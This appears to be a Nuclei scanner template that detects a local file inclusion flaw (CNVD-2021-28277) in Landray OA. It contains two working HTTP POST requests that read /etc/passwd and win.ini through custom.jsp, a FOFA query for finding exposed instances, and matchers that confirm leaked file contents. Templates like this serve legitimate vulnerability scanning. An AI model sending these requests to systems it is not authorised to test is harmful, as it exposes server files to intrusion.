id: CNVD-2021-28277 info: name: Landray-OA - Local File Inclusion author: pikpikcu,daffainfo severity: high description: Landray-OA is susceptible to local file inclusion. reference: - https://www.aisoutu.com/a/1432457 - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw metadata: max-request: 2 fofa-query: app="Landray OA system" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 tags: landray,lfi,cnvd,cnvd2021 http: - raw: - | POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded var={"body":{"file":"file:///etc/passwd"}} - | POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded var={"body":{"file":"file:///c://windows/win.ini"}} stop-at-first-match: true matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - "for 16-bit app support" condition: or - type: status status: - 200